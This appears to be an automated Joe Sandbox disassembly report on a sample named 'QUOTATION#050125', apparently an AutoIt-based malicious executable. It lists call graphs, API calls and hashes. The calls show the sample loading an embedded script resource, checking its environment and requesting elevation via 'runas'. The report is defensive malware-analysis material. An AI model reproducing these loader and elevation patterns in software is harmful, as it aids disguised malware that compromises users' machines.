99763->99815 99766 102d6d 99833 ca8c7 22 API calls 99766->99833 99767 c2f59 99767->99742 99768 c2f63 99767->99768 99816 e4a28 40 API calls 99768->99816 99771 102d83 99834 c3084 22 API calls 99771->99834 99772 c2f6e 99772->99747 99774 c2f78 99772->99774 99817 e4a28 40 API calls 99774->99817 99775 102d90 99777 c2f83 99777->99751 99778 c2f8d 99777->99778 99818 e4a28 40 API calls 99778->99818 99780 c2f98 99781 c2fdc 99780->99781 99819 c3084 22 API calls 99780->99819 99781->99766 99782 c2fe8 99781->99782 99782->99775 99822 c63eb 22 API calls 
99782->99822 99784 c2fbf 99820 ca8c7 22 API calls 99784->99820 99787 c2ff8 99823 c6a50 22 API calls 99787->99823 99788 c2fcd 99821 c3084 22 API calls 99788->99821 99791 c3006 99824 c70b0 23 API calls 99791->99824 99793 c3021 99796 c3065 99793->99796 99825 c6f88 22 API calls 99793->99825 99826 c70b0 23 API calls 99793->99826 99827 c3084 22 API calls 99793->99827 99799 c4af0 99798->99799 99800 c6b57 22 API calls 99799->99800 99801 c4b22 99799->99801 99800->99801 99809 c4b58 99801->99809 99835 c4c6d 99801->99835 99803 c9cb3 22 API calls 99805 c4c52 99803->99805 99804 c9cb3 22 API calls 99804->99809 99807 c515f 22 API calls 99805->99807 99806 c4c6d 22 API calls 99806->99809 99808 c4c5e 99807->99808 99808->99723 99809->99804 99809->99806 99810 c515f 22 API calls 99809->99810 99811 c4c29 99809->99811 99810->99809 99811->99803 99811->99808 99812->99737 99813->99739 99814->99763 99815->99767 99816->99772 99817->99777 99818->99780 99819->99784 99820->99788 99821->99781 99822->99787 99823->99791 99824->99793 99825->99793 99826->99793 99827->99793 99828->99747 99829->99751 99830->99758 99831->99762 99832->99766 99833->99771 99834->99775 99836 caec9 22 API calls 99835->99836 99837 c4c78 99836->99837 99837->99801 99838 c1033 99843 c4c91 99838->99843 99842 c1042 99844 ca961 22 API calls 99843->99844 99845 c4cff 99844->99845 99851 c3af0 99845->99851 99848 c4d9c 99849 c1038 99848->99849 99854 c51f7 22 API calls 99848->99854 99850 e00a3 29 API calls 99849->99850 99850->99842 99855 c3b1c 99851->99855 99854->99848 99856 c3b29 99855->99856 99857 c3b0f 99855->99857 99856->99857 99858 c3b30 RegOpenKeyExW 99856->99858 99857->99848 99858->99857 99859 c3b4a RegQueryValueExW 99858->99859 99860 c3b6b 99859->99860 99861 c3b80 RegCloseKey 99859->99861 99860->99861 99861->99857

Control-flow Graph

• Executed
• Not Executed
                                                                                      control_flow_graph 234 c42de-c434d call ca961 GetVersionExW call c6b57 239 103617-10362a 234->239 240 c4353 234->240 241 10362b-10362f 239->241 242 c4355-c4357 240->242 243 103631 241->243 244 103632-10363e 241->244 245 c435d-c43bc call c93b2 call c37a0 242->245 246 103656 242->246 243->244 244->241 247 103640-103642 244->247 261 c43c2-c43c4 245->261 262 1037df-1037e6 245->262 250 10365d-103660 246->250 247->242 249 103648-10364f 247->249 249->239 252 103651 249->252 253 103666-1036a8 250->253 254 c441b-c4435 GetCurrentProcess IsWow64Process 250->254 252->246 253->254 258 1036ae-1036b1 253->258 256 c4494-c449a 254->256 257 c4437 254->257 260 c443d-c4449 256->260 257->260 263 1036b3-1036bd 258->263 264 1036db-1036e5 258->264 270 c444f-c445e LoadLibraryA 260->270 271 103824-103828 GetSystemInfo 260->271 261->250 265 c43ca-c43dd 261->265 266 103806-103809 262->266 267 1037e8 262->267 272 1036ca-1036d6 263->272 273 1036bf-1036c5 263->273 268 1036e7-1036f3 264->268 269 1036f8-103702 264->269 274 103726-10372f 265->274 275 c43e3-c43e5 265->275 279 1037f4-1037fc 266->279 280 10380b-10381a 266->280 276 1037ee 267->276 268->254 277 103704-103710 269->277 278 103715-103721 269->278 281 c449c-c44a6 GetSystemInfo 270->281 282 c4460-c446e GetProcAddress 270->282 272->254 273->254 286 103731-103737 274->286 287 10373c-103748 274->287 284 c43eb-c43ee 275->284 285 10374d-103762 275->285 276->279 277->254 278->254 279->266 280->276 288 10381c-103822 280->288 283 c4476-c4478 281->283 282->281 289 c4470-c4474 GetNativeSystemInfo 282->289 294 c447a-c447b FreeLibrary 283->294 295 c4481-c4493 283->295 290 103791-103794 284->290 291 c43f4-c440f 284->291 292 103764-10376a 285->292 293 10376f-10377b 285->293 286->254 287->254 288->279 289->283 290->254 298 10379a-1037c1 290->298 296 103780-10378c 291->296 297 c4415 291->297 292->254 293->254 294->295 296->254 297->254 299 1037c3-1037c9 298->299 300 
1037ce-1037da 298->300 299->254 300->254
                                                                                      APIs
                                                                                      • GetVersionExW.KERNEL32(?), ref: 000C430D
                                                                                      • GetCurrentProcess.KERNEL32(?,0015CB64,00000000,?,?), ref: 000C4422
                                                                                      • IsWow64Process.KERNEL32(00000000,?,?), ref: 000C4429
                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 000C4454
                                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 000C4466
                                                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 000C4474
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 000C447B
                                                                                      • GetSystemInfo.KERNEL32(?,?,?), ref: 000C44A0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64
                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                      • API String ID: 2834427828-3101561225
                                                                                      • Opcode ID: 4163626d5772927278403cfea605f28f49a57f836d3b1fdd8a9b53bf3e80218d
                                                                                      • Instruction ID: db7587102a40a58df5881e0f1bc71648e5fcf250f3e98e4bbb80a9438556a350
                                                                                      • Opcode Fuzzy Hash: 4163626d5772927278403cfea605f28f49a57f836d3b1fdd8a9b53bf3e80218d
                                                                                      • Instruction Fuzzy Hash: 3FA18376D0A3C2FFC716CB6A78416AD7FB87B26320B18449ED49197E62D36047C8CB61

                                                                                      Control-flow Graph

                                                                                      (rendered graph; only the node labels with their calls are kept from the image text: c42a2-c42ba CreateStreamOnHGlobal; c42bc-c42d3 FindResourceExW; 1035ba-1035c9 LoadResource; 1035cf-1035dd SizeofResource; 1035e3-1035ee LockResource)
                                                                                      APIs
                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,000C50AA,?,?,00000000,00000000), ref: 000C42B2
                                                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,000C50AA,?,?,00000000,00000000), ref: 000C42C9
                                                                                      • LoadResource.KERNEL32(?,00000000,?,?,000C50AA,?,?,00000000,00000000,?,?,?,?,?,?,000C4F20), ref: 001035BE
                                                                                      • SizeofResource.KERNEL32(?,00000000,?,?,000C50AA,?,?,00000000,00000000,?,?,?,?,?,?,000C4F20), ref: 001035D3
                                                                                      • LockResource.KERNEL32(000C50AA,?,?,000C50AA,?,?,00000000,00000000,?,?,?,?,?,?,000C4F20,?), ref: 001035E6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                      • String ID: SCRIPT
                                                                                      • API String ID: 3051347437-3967369404
                                                                                      • Opcode ID: d76a7e9d54f7317ce1fcaadf43784a9dcaf41a1448cac42d0c233214586b4fe7
                                                                                      • Instruction ID: 82bd68b8611ed767056485405dd692ce703ab16ce168d5a52986b413788a9dbf
                                                                                      • Opcode Fuzzy Hash: d76a7e9d54f7317ce1fcaadf43784a9dcaf41a1448cac42d0c233214586b4fe7
                                                                                      • Instruction Fuzzy Hash: 6F117C70600700FFD7218F65DC49F2B7BB9EBC5B52F20416DB8169A6A0DB71D840DA60

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 000C2B6B
                                                                                        • Part of subcall function 000C3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00191418,?,000C2E7F,?,?,?,00000000), ref: 000C3A78
                                                                                      • GetForegroundWindow.USER32(runas,?,?,?,?,?,00182224), ref: 00102C10
                                                                                      • ShellExecuteW.SHELL32(00000000,?,?,00182224), ref: 00102C17
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow
                                                                                      • String ID: runas
                                                                                      • API String ID: 3686610399-4000483414
                                                                                      • Opcode ID: 46d86c3a60fd558d563c46b856a5679bea587fd4b527ebd07e15882b7ffdde2b
                                                                                      • Instruction ID: 679c2b2f75c00d100f84de83dfcfcf83a512bd1902dfed9549f553438934faa0
                                                                                      • Opcode Fuzzy Hash: 46d86c3a60fd558d563c46b856a5679bea587fd4b527ebd07e15882b7ffdde2b
                                                                                      • Instruction Fuzzy Hash: 7311E631208342AACB14FF60D896FFEBBA5AF95300F44542DF082174A3CF318A8AC752
                                                                                      APIs
                                                                                      • GetInputState.USER32 ref: 000CD807
                                                                                      • timeGetTime.WINMM ref: 000CDA07
                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000CDB28
                                                                                      • TranslateMessage.USER32(?), ref: 000CDB7B
                                                                                      • DispatchMessageW.USER32(?), ref: 000CDB89
                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000CDB9F
                                                                                      • Sleep.KERNEL32(0000000A), ref: 000CDBB1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                      • String ID:
                                                                                      • API String ID: 2189390790-0
                                                                                      • Opcode ID: 1a488624a1c405d9525cd524d1afecb7f495ed3a9051abda7cec2d1412d7d196
                                                                                      • Instruction ID: 55cee646107b16d88bcb72dce43a50625d4022677e09d370cec81926d059cb38
                                                                                      • Opcode Fuzzy Hash: 1a488624a1c405d9525cd524d1afecb7f495ed3a9051abda7cec2d1412d7d196
                                                                                      • Instruction Fuzzy Hash: 2642AE30608342EFD728DF24C885FAEB7E1BF86304F14456EE5568B692D770A894DB92

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 000C2D07
                                                                                      • RegisterClassExW.USER32(00000030), ref: 000C2D31
                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000C2D42
                                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 000C2D5F
                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000C2D6F
                                                                                      • LoadIconW.USER32(000000A9), ref: 000C2D85
                                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000C2D94
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                      • API String ID: 2914291525-1005189915
                                                                                      • Opcode ID: 67de3d04cbce7eaac04c98d75b28353ac3b286e51f674e27bc55d62b0453c15d
                                                                                      • Instruction ID: be21fe7e0f91b3c0d721edfd9c1b17c86909716ac55c3459bb1d50b7e0575016
                                                                                      • Opcode Fuzzy Hash: 67de3d04cbce7eaac04c98d75b28353ac3b286e51f674e27bc55d62b0453c15d
                                                                                      • Instruction Fuzzy Hash: C621F2B5901309EFDB00DFA4EC89BDDBBB4FB08706F00811AF911AAAA0D7B10584CF90

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 000C2B8E
                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 000C2B9D
                                                                                      • LoadIconW.USER32(00000063), ref: 000C2BB3
                                                                                      • LoadIconW.USER32(000000A4), ref: 000C2BC5
                                                                                      • LoadIconW.USER32(000000A2), ref: 000C2BD7
                                                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 000C2BEF
                                                                                      • RegisterClassExW.USER32(?), ref: 000C2C40
                                                                                        • Part of subcall function 000C2CD4: GetSysColorBrush.USER32(0000000F), ref: 000C2D07
                                                                                        • Part of subcall function 000C2CD4: RegisterClassExW.USER32(00000030), ref: 000C2D31
                                                                                        • Part of subcall function 000C2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000C2D42
                                                                                        • Part of subcall function 000C2CD4: InitCommonControlsEx.COMCTL32(?), ref: 000C2D5F
                                                                                        • Part of subcall function 000C2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000C2D6F
                                                                                        • Part of subcall function 000C2CD4: LoadIconW.USER32(000000A9), ref: 000C2D85
                                                                                        • Part of subcall function 000C2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000C2D94
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                      • String ID: #$0$AutoIt v3
                                                                                      • API String ID: 423443420-4155596026
                                                                                      • Opcode ID: f4e985a3e25f49e24d66b73e1dff63fd20246cfa61c166f0e8fd7e89ed860d6c
                                                                                      • Instruction ID: fe26e3582c81eb33e1c8bf37f8c71140ac77193b9c675fbedcdc58c8f1bc6d6e
                                                                                      • Opcode Fuzzy Hash: f4e985a3e25f49e24d66b73e1dff63fd20246cfa61c166f0e8fd7e89ed860d6c
                                                                                      • Instruction Fuzzy Hash: 24210770E10319BFDB109FA5EC95AAD7FB4FB48B60F04412BE504A6AA0D7B516C0CF90

                                                                                      Control-flow Graph

                                                                                      (rendered graph; only the node labels with their calls are kept from the image text: c31d0-c31d8 DefWindowProcW; c3201-c3214 KillTimer call c30f2 call c3c50; c321d-c3244 SetTimer RegisterWindowMessageW; c3246-c3251 CreatePopupMenu; c3253-c3263 call c326f; c3265-c326d PostQuitMessage; 102db0-102dc1 call c18e2; 102dc6-102dd2 SetFocus; 102dd7-102df6 MoveWindow; 102dfb-102e23 call c18e2 call de499; 102e35-102e48 call c30f2 call c3837; 102e5a-102e63 call 120ad7; 102e68-102e77 call 12c161; 102e7c-102e90 call 12bf30)
                                                                                      APIs
                                                                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,000C316A,?,?), ref: 000C31D8
                                                                                      • KillTimer.USER32(?,00000001,?,?,?,?,?,000C316A,?,?), ref: 000C3204
                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000C3227
                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,000C316A,?,?), ref: 000C3232
                                                                                      • CreatePopupMenu.USER32 ref: 000C3246
                                                                                      • PostQuitMessage.USER32(00000000), ref: 000C3267
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                      • String ID: TaskbarCreated
                                                                                      • API String ID: 129472671-2362178303
                                                                                      • Opcode ID: 958ea357a011e1193dc9c2114c8d471437d6a9d0583cf3d90911265b807cd78d
                                                                                      • Instruction ID: cd355492a345d4dfcc7de5553b5c1b6df36b864a425c3d3cd418806d0746e26f
                                                                                      • Opcode Fuzzy Hash: 958ea357a011e1193dc9c2114c8d471437d6a9d0583cf3d90911265b807cd78d
                                                                                      • Instruction Fuzzy Hash: CF41F835264305BEDF251B789D0EFBD3A65E709354F08811EF90196992CB718EC09BA1

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 000C3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00191418,?,000C2E7F,?,?,?,00000000), ref: 000C3A78
                                                                                        • Part of subcall function 000C3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 000C3379
                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 000C356A
                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0010318D
                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 001031CE
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00103210
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath
                                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                      • API String ID: 338900592-2727554177
                                                                                      • Opcode ID: 400d7c850ec5ce48a8e063707a9b8d32016a1725cc8ff96b85842fe4c42a0f46
                                                                                      • Instruction ID: af32e742863418d70d3f016eeb32dd102594d11a6e200a039f543b555654bf6b
                                                                                      • Opcode Fuzzy Hash: 400d7c850ec5ce48a8e063707a9b8d32016a1725cc8ff96b85842fe4c42a0f46
                                                                                      • Instruction Fuzzy Hash: 5471A171505301AEC314DF25DC82DAFBBE8FF89340F40452EF495971A1EB709A88CBA1

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 0010039A: CreateFileW.KERNELBASE(00000000,00000000,?,00100704,?,?,00000000,?,00100704,00000000,0000000C), ref: 001003B7
                                                                                      • GetLastError.KERNEL32 ref: 0010076F
                                                                                      • GetFileType.KERNELBASE(00000000), ref: 00100782
                                                                                      • GetLastError.KERNEL32 ref: 0010078C
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 001007B5
                                                                                      • CloseHandle.KERNEL32(?), ref: 001008FF
                                                                                      • GetLastError.KERNEL32 ref: 00100931
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$CloseFileHandle$CreateType
                                                                                      • String ID: H
                                                                                      • API String ID: 3086256261-2852464175
                                                                                      • Opcode ID: 25838155a07724deea7506e28cf2246fd269850ebacd07b7104b1603ccda9686
                                                                                      • Instruction ID: 1323a7bc6bad1d214352c7f7926564c9b0b1155769eef22b43f1cade7152fca9
                                                                                      • Opcode Fuzzy Hash: 25838155a07724deea7506e28cf2246fd269850ebacd07b7104b1603ccda9686
                                                                                      • Instruction Fuzzy Hash: 86A12732A002488FDF1AAF68DC51BAD7BA0EB0A320F14415EF855AF3D2D7759D52CB91

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00E1A7A1
                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E1A9C7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288643282635.0000000000E18000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E18000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_e18000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFileFreeVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 204039940-0
                                                                                      • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                                      • Instruction ID: a38f5dc1df5f9f0da717cc24a38efbd386e3d05d2ed9a4860813c432b8cff172
                                                                                      • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                                      • Instruction Fuzzy Hash: EBA11770E01209EBDB14CFA4C998BFEB7B5FF48304F249169E215BB280D7759A81CB95

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000C2C91
                                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 000C2CB2
                                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,000C1CAD,?), ref: 000C2CC6
                                                                                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,000C1CAD,?), ref: 000C2CCF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CreateShow
                                                                                      • String ID: AutoIt v3$edit
                                                                                      • API String ID: 1584632944-3779509399
                                                                                      • Opcode ID: c2a1766012652c63616c3f8a17f2384799addf727d85c704eb20f6d8e0103e20
                                                                                      • Instruction ID: 555858e77866bac33c99a308619502770e0a3a0de833dc73a82619dd23d1d54b
                                                                                      • Opcode Fuzzy Hash: c2a1766012652c63616c3f8a17f2384799addf727d85c704eb20f6d8e0103e20
                                                                                      • Instruction Fuzzy Hash: C7F0DA75540391BEEB311B27AC08E773EBDE7CAF61B00005AFD14A69A0C67119D4DAB1

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 00E1A370: Sleep.KERNELBASE(000001F4), ref: 00E1A381
                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E1A5C3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288643282635.0000000000E18000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E18000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_e18000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFileSleep
                                                                                      • String ID: ES9Y7H281CDYVVYDD7LC
                                                                                      • API String ID: 2694422964-148796157
                                                                                      • Opcode ID: e0a77e89d3fb833941fcf30cb5155f0ac36e0c1659617306f3dac9ed843b71fc
                                                                                      • Instruction ID: 7959db55b66186bfc572017e07c24468e364b82b3faf03ced0a7cc055b1e40c2
